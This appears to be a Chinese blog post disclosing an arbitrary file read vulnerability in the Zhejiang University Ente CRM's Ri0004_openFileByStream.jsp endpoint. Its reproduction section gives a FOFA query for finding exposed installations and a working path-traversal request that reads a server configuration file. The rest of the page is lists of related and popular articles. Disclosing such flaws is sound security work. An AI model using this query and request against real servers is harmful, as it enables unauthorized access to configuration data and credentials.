浙大恩特客户资源管理系统Ri0004_openFileByStream.jsp接口存在任意文件读取漏洞

  • 开发
  • 19

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。

浙大恩特客户资源管理系统Ri0004_openFileByStream.jsp接口存在任意文件读取漏洞。

资产搜索

fofa

app="浙大恩特客户资源管理系统"

 漏洞复现

https://127.0.0.1/entsoft/module/i0004_openFileByStream.jsp?filepath=/../EnterCRM/bin/xy.properties&filename=conan

阅读全部

相关推荐

  6. 用友crm客户关系管理pub/help2.php接口任意文件读取漏洞复现 [附POC]

    2024-04-15 05:38:04       78 阅读

最近更新

  4. TCP协议是安全的吗?

    2024-04-15 05:38:04       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-04-15 05:38:04       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-04-15 05:38:04       19 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-04-15 05:38:04       20 阅读

热门阅读

  2. SpringBoot实用开发(十五)-- ActiveMQ的安装

    2024-04-15 05:38:04       21 阅读

  3. [HDFS Web界面功能 ]

    2024-04-15 05:38:04       21 阅读

  6. Docker in Docker (DinD): 深入探索与实际应用

    2024-04-15 05:38:04       16 阅读

  7. 快速配置docker 国内源地址

    2024-04-15 05:38:04       44 阅读

  10. 上一篇文章中的nvm有歧义

    2024-04-15 05:38:04       33 阅读

  11. 从零实现诗词GPT大模型:了解自注意力机制

    2024-04-15 05:38:04       38 阅读

  14. 2024-04-14 问AI: 在深度学习中,为什么需要激活函数?

    2024-04-15 05:38:04       18 阅读

  15. Spring Boot 经典面试题(八)

    2024-04-15 05:38:04       18 阅读

  16. Leetcode 528 按权重随机选择

    2024-04-15 05:38:04       19 阅读

  21. [Linux] keytool 命令(by Copilot)

    2024-04-15 05:38:04       18 阅读

  24. node.js

    2024-04-15 05:38:04       41 阅读